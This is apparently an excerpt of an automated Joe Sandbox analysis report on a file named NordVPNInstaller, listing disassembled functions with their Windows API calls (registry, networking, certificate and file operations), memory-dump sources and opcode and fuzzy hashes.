getaddrinfo.WS2_32(?,00000E24), ref: 05DE1FF7

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 2d3597f53387da266b4bac8849c1ca49e7dedabdb7afaa7546a7680842023afc
Instruction ID: 6eded9a364c18beeec23b443bcb38bbbdb45bb2e1eb7f4075b4ca758d44f2915
Opcode Fuzzy Hash: 2d3597f53387da266b4bac8849c1ca49e7dedabdb7afaa7546a7680842023afc
Instruction Fuzzy Hash: F221D172500204AEEB31DB61CD84FA6F7ACEF04314F04885AFA499A681D774E58DCBB1

Function 05DE50A0 Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE513C

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 836679656834af93fc6a98cb73fed39820196ce15ac1a1513aec9c7e70735ae0
Instruction ID: 1f70291e863f9d987e638c9f534f0c462a0c645a7008487ee17eadde21b571bc
Opcode Fuzzy Hash: 836679656834af93fc6a98cb73fed39820196ce15ac1a1513aec9c7e70735ae0
Instruction Fuzzy Hash: C92191755093806FD722CF55DC44FA7BFB8EF46210F08849BE985DB692D224E948CBB1

Function 05DE4F9E Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05DE5032

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 20a9ff32754302c583a34f692f9aea0698dd26230a27cd1632e0f7705fee7567
Instruction ID: de53284ac03084a9eb40d24392966f6bf945cf10f1c8f80510401830751e1106
Opcode Fuzzy Hash: 20a9ff32754302c583a34f692f9aea0698dd26230a27cd1632e0f7705fee7567
Instruction Fuzzy Hash: 8321B172505344AFE7228B51DD44FAAFFB8EF45310F08849AF944DB652D264E948CB71

Function 05DE158C Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 05DE1625

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: ead47b8606260995e822d71e4b5986761edf077eb78a2502ea00868572140700
Instruction ID: 46cff47693cc3746354c3c80152c4391ecfa70e47659dc2135e8ff6279a1f703
Opcode Fuzzy Hash: ead47b8606260995e822d71e4b5986761edf077eb78a2502ea00868572140700
Instruction Fuzzy Hash: 8721E1754093846FEB228B21CC44FA6BFB8EF46314F0984DBE9448F593D264A90DCB71

Function 05DE1786 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE1830

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: e61e6fa14d705408021bb41d628f7c6cb0581be0b62b85e16a42df7403f8f6f4
Instruction ID: 4fc458bf79f53102ece77894d185549de2bbccd7ee3a171d7bd9976c1f7ea985
Opcode Fuzzy Hash: e61e6fa14d705408021bb41d628f7c6cb0581be0b62b85e16a42df7403f8f6f4
Instruction Fuzzy Hash: FC31E3754053846FEB22CB61CC44FA6BFB8EF46314F08889AE9849B553D234A509C7B1

Function 05DE2685 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE2716

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: ff822c2f2775e80d871e216934258d178ff7b8ea724d267d993cfe7a765f47f9
Instruction ID: a2ec1e7aa3edb19122f0fc01b7c1a3b19e345b05ef3c536e1de44d5e169b6f38
Opcode Fuzzy Hash: ff822c2f2775e80d871e216934258d178ff7b8ea724d267d993cfe7a765f47f9
Instruction Fuzzy Hash: 52219175505380AFE722CB51CC44FA6BFACEF46320F08849AE945DB652D264E949CB71

Function 05DE2599 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE2626

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 93ddfd4ff59951bd7def9d936d90abdf0fa1e2545d1b4b33a3f2182555314deb
Instruction ID: 35d31924f884285076633e3b094b8799641c091241e97a509d531244607ddf6d
Opcode Fuzzy Hash: 93ddfd4ff59951bd7def9d936d90abdf0fa1e2545d1b4b33a3f2182555314deb
Instruction Fuzzy Hash: 4221E2765093806FE712CB21DC44FA6BFB8EF46320F0884DBE985DB5A3C264A908C771

Function 05DE277C Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 05DE2822

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: ad6640822fd6efdd0f8f563ad7f5fe78606ef507c728cbcc2a60589e86c84d1f
Instruction ID: 7b1ef153f9d8c88bb4e0e8e8a988a6c1151d9ae2b5d1735a6329fe930b2aa1a9
Opcode Fuzzy Hash: ad6640822fd6efdd0f8f563ad7f5fe78606ef507c728cbcc2a60589e86c84d1f
Instruction Fuzzy Hash: B421DD715093C06FD3128B61CC55B66BFB8EF87210F0984CBD884DB6A3D624A909C7B2

Function 05DE0D64 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE0DF8

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 1bea2d64ad4d69a92b55de52d68c9c098f83a5aebdd465db12e343cab5923113
Instruction ID: 069d9efa19e8dd3aa200e3d202aa2f50c0cdfde69951c436663d667cfa62f02d
Opcode Fuzzy Hash: 1bea2d64ad4d69a92b55de52d68c9c098f83a5aebdd465db12e343cab5923113
Instruction Fuzzy Hash: 062106B55043406FEB128F11DC44FA2BFA8FF42724F1884AAE9448F593D2789949CBB1

Function 05DE4316 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(?,?,?,?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE43AD

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f215676f2282458329e447317f732ba78abca4019c0737e3150b50b4b0af13d8
Instruction ID: 17e97ebb1376d43100006e2b680de515b046d90a445e691f2565ecac6f77383e
Opcode Fuzzy Hash: f215676f2282458329e447317f732ba78abca4019c0737e3150b50b4b0af13d8
Instruction Fuzzy Hash: C4314B7550E3C05FDB138B65DC54A62BFB8EF47214B0984DBE984CF5A3D264A808C772

Function 05DE0257 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 05DE02FA

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: dafa236f4c20e405096e258c2608ddb81b234a5fd6e137474dfb1eb5a42ecce7
Instruction ID: 1b08c0e371125cb8742ccb31786dbe204fb42fd8842a15f76ac6f635b34df080
Opcode Fuzzy Hash: dafa236f4c20e405096e258c2608ddb81b234a5fd6e137474dfb1eb5a42ecce7
Instruction Fuzzy Hash: EA21D87550E3C06FD3138B25CC51B62BFB4EF87614F0980CBE8849B693D625A959C7B2

Function 0104BE78 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 0104BF0D

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5d017488fd8bb398e95915fe4b8d79cc587c4cce362d81935360ef82368e1c43
Instruction ID: c2160abfb281158ab41a4e7535a935eb1728a6f8ef2795415ed209c34009e4b3
Opcode Fuzzy Hash: 5d017488fd8bb398e95915fe4b8d79cc587c4cce362d81935360ef82368e1c43
Instruction Fuzzy Hash: FF21F8B54097806FD7138B259C85BA2BFACEF47724F0880DAED848B693D2649909CB71

Function 05DE4152 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE41F0

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: fe7187eaca31eac8b691f277ccff4debde7c983b53865f097e465de61deab406
Instruction ID: 8091fccc391952049b0d4d9af0e71337cdc811557426e28c0596a834c16a311a
Opcode Fuzzy Hash: fe7187eaca31eac8b691f277ccff4debde7c983b53865f097e465de61deab406
Instruction Fuzzy Hash: EE21A176505340AFEB22CF11DC44FA3BFB8EF45310F08849AE9459B692D364E848CB71

Function 05DE4ECC Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 05DE4F72

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: ed94736323bef1937ca35cebf426595b6f393810841b6e40312cfb09f57ed9e1
Instruction ID: a810246d37d2c7a41ce96e25cf962d6ba094db7df65390795bd63a17611b6083
Opcode Fuzzy Hash: ed94736323bef1937ca35cebf426595b6f393810841b6e40312cfb09f57ed9e1
Instruction Fuzzy Hash: 4A216D6550E3C06FC3138B368C55A21BFB4EF87614F1D80CFD8849B6A3D625A95AC7A2

Function 05DE16B2 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05DE1731

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: decf4bdf857d052eb80f5517593c43174404acc1016fee5062236dc504f03c27
Instruction ID: ad4deda2527f01938c967a7cc435b771173bb7cb50d5c7c14cf532fbfdde1b85
Opcode Fuzzy Hash: decf4bdf857d052eb80f5517593c43174404acc1016fee5062236dc504f03c27
Instruction Fuzzy Hash: A521CFB2600204AEE720EF51CD44FABBBECEF04720F04885AE945DB652D734E548CBB1

Function 05DE3A1B Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE3AA2

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 00560fbf7943e19964246971335855923eaeeeb540f853d8bafcdb6a318fe715
Instruction ID: bf547950f299c8733d56647cb40373733b2943bf8d864cab1668538bff00b155
Opcode Fuzzy Hash: 00560fbf7943e19964246971335855923eaeeeb540f853d8bafcdb6a318fe715
Instruction Fuzzy Hash: AA21C1755053806FEB21CB61DC45FA6BFB8EF46320F08889BE985CB652C365E948CB71

Function 05DE09D6 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05DE0A6A

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: d0a2c1463217ed89dfe95ecade4fb89dc91be20c92b3d2cb8778548e226ceb82
Instruction ID: ee65f439a7ac179bfb0fcf8f32e10f1b887a52d3679588cc844768cc52d15e39
Opcode Fuzzy Hash: d0a2c1463217ed89dfe95ecade4fb89dc91be20c92b3d2cb8778548e226ceb82
Instruction Fuzzy Hash: 2D21E171405344AFE722CB52CC44F96FBF8EF09220F08849EE9858B652D375E548CB61

Function 05DE6AF5 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,619391D9,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 05DE6B84

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: a6fdb7c3bc0084249b4894b8cdcf2e32e60fc7f993c517bd99ac7fd3893e6538
Instruction ID: 991abe02e2699010baba85889858aa0cbd813f9300e8e60d5dda6df7995a675a
Opcode Fuzzy Hash: a6fdb7c3bc0084249b4894b8cdcf2e32e60fc7f993c517bd99ac7fd3893e6538
Instruction Fuzzy Hash: 0E215A7540E3C09FDB138B759C65692BFB4EF47210B0E84DBD8848F1A3D268A849CB62

Function 05DE46AF Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE4734

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 10ff1ff4dc5e9028fdf31a316457fa232cefd077cab5263c5c28a532b63498b4
Instruction ID: b07f05f5cdd7d1de21eb4a4fff47533d3b216af80e3fc456d83dceaabac5e60a
Opcode Fuzzy Hash: 10ff1ff4dc5e9028fdf31a316457fa232cefd077cab5263c5c28a532b63498b4
Instruction Fuzzy Hash: CA21C5755053846FD711CB55DC48FA6FFA8EF46320F0884ABE944CB592D368A948CBB1

Function 05DE0846 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05DE08B7

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: ee7099cb152259d279383fc609d5f7d76c7468458121f0b8b64e75c549a4b8f9
Instruction ID: 2cd0790a75f8a1f91562ccc11857b5931c5326b1d79fa1746363d5e15dff8af8
Opcode Fuzzy Hash: ee7099cb152259d279383fc609d5f7d76c7468458121f0b8b64e75c549a4b8f9
Instruction Fuzzy Hash: 3621C576500204AFEB20DF25DD44FAAB7ACEF04324F08845AE945DB641D774E548CBB1

Function 0104B420 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 0104B4BB

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3be8320adfec1821b30ff9fe60380622947d06e5a010e563e85159000ab33327
Instruction ID: 5d996150fd055b37a470e2dae9985e65064743828f7179abf4a4163fa0cf7377
Opcode Fuzzy Hash: 3be8320adfec1821b30ff9fe60380622947d06e5a010e563e85159000ab33327
Instruction Fuzzy Hash: 73210A750053806FE722CB15CC85FA6BFB8EF46324F0880DAE9845F193C268A84DCB71

Function 0104BDA2 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0104BE21

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 09eb2db0d75c17ad75cdeb14566a716649fb7342bbb02501d95ed78eb233a8b8
Instruction ID: be6c41dc725c2c63a89f64ac02a3ef3806c6dbd214d72c3811935de627a4e09f
Opcode Fuzzy Hash: 09eb2db0d75c17ad75cdeb14566a716649fb7342bbb02501d95ed78eb233a8b8
Instruction Fuzzy Hash: 4E2192B5500200AFEB21CF66DD85B66FBE8EF44324F08846DEA858B652D771E419CB71

Function 05DE0503 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05DE0580

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 507e046c99012660f66284835cdf84aeaa1c4f575ab8a5f361339cd27248b36c
Instruction ID: b2889eaef2feb0df22d8f4512933cf63ddd17e7df767849f88cb52fead4ec7fc
Opcode Fuzzy Hash: 507e046c99012660f66284835cdf84aeaa1c4f575ab8a5f361339cd27248b36c
Instruction Fuzzy Hash: 9221B1754093C09FCB128B609C94BA6BFB0EF47320F0D88DBD9C48F563C2299959CB62

Function 0104B606 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0104B685

Memory Dump Source

Source File: 00000000.00000002.2765090150.000000000104A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_104a000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 135621f426c74c990093ff96f2876b9ac67e3f0fb6f6c547dc2f9103d8394675
Instruction ID: bf4846fdcd5b488a4af1974fb1be63caaa7e9c1ccb944345e803d5b2aaa3f867
Opcode Fuzzy Hash: 135621f426c74c990093ff96f2876b9ac67e3f0fb6f6c547dc2f9103d8394675
Instruction Fuzzy Hash: B421D4B6500204AFE7219F15CD84FABFBECEF08314F04845AE9458B652D734E54C8BB1

Function 05DE13F2 Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE1476

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: eb71b11f82162f523efc6afef4bb57e15c8327cc2f20a84c878e4e2db50456c2
Instruction ID: 43f136ad60ff069dec611d4bb05b62bc6fdf2fb4b89a2636bad5ddf3da65dbe2
Opcode Fuzzy Hash: eb71b11f82162f523efc6afef4bb57e15c8327cc2f20a84c878e4e2db50456c2
Instruction Fuzzy Hash: A821FFB64043806FD722CB51CC88FA7BBBCEF45324F08849BE944DB642D238A548CBB1

Function 05DE4FBE Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05DE5032

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a9e7e4fb40cc76528e6a16bed619c4dd412543af2716ac47075fe9c868ee9c85
Instruction ID: a3aebcdb0b560ab6df0028e2db91b824e7c28259851a5d936ba0a6b26546694c
Opcode Fuzzy Hash: a9e7e4fb40cc76528e6a16bed619c4dd412543af2716ac47075fe9c868ee9c85
Instruction Fuzzy Hash: 7221DEB2500200AEEB219F51DD44FBAFBA8EF04324F08885AFD458B642D374E5488AB2

Function 05DE2102 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE2191

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 0d18baabbb3e52fedb41453c01ffbf5d2709c72f977a61b3a57ea3691443167c
Instruction ID: 33cf0c896a051f485745427e58e55922f4072edc3626608159739c5d7a39208f
Opcode Fuzzy Hash: 0d18baabbb3e52fedb41453c01ffbf5d2709c72f977a61b3a57ea3691443167c
Instruction Fuzzy Hash: C921D7794093806FD7228B11DC45FA6FFB8EF46310F0884CBE9848B593D365A909CBB2

Function 05DE3C9C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 05DE3D20

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 1a70ede5bbf397c1e91a9f3d84c34c6e705dc4f0fba8d345b59acef6323a563b
Instruction ID: 54a7d22a703b9f90cb661df0b508e458e5616bf525b8e3cc17fbad237b46e988
Opcode Fuzzy Hash: 1a70ede5bbf397c1e91a9f3d84c34c6e705dc4f0fba8d345b59acef6323a563b
Instruction Fuzzy Hash: DC2181755083809FD721CF15D844B62FFF8EF45210F08889AED85CB662D375E848CB61

Function 05DE18B2 Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05DE1926

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 668cb92cd16e3903350e53ec261ee51b807364eb01bd457a657b80bd91616762
Instruction ID: a6859b75d3ef184835fab782564b934fe3c936dffdc440040309fabbb9430aa5
Opcode Fuzzy Hash: 668cb92cd16e3903350e53ec261ee51b807364eb01bd457a657b80bd91616762
Instruction Fuzzy Hash: 8121AEB2600204AFEB209F55DD44FBAFBACEF04724F08885AED459B652D334E548CBB1

Function 05DE3B02 Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE3B8A

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 3b9265362c3fee495184b974f0aa4bc6ef1c2464d3d105a9904a4173465a72c3
Instruction ID: 627021889d9d836092d10f9665ff47ecdc5af874e9dc631bd3784ef12948a6db
Opcode Fuzzy Hash: 3b9265362c3fee495184b974f0aa4bc6ef1c2464d3d105a9904a4173465a72c3
Instruction Fuzzy Hash: 0721D075408380AFD7218B15CC44FA6FFB8EF45310F08889BE9449B553C364A508CB71

Function 05DE0C9A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05DE0D0D

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 776a420178dc3e46be7080389e0c2ff2f3da359206b97f24a2c0fd8732a88c00
Instruction ID: a7b6503b1cf6a95804a0a4dd87827dc3bce0800b40abda1720d8193ef2d366fa
Opcode Fuzzy Hash: 776a420178dc3e46be7080389e0c2ff2f3da359206b97f24a2c0fd8732a88c00
Instruction Fuzzy Hash: C421B0756002009FE720DB66CD89BA6FBE8EF04320F04846AED49CBB42D7B1E449CB71

Function 05DE1232 Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,619391D9,00000000,00000000,00000000,00000000), ref: 05DE12AD

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
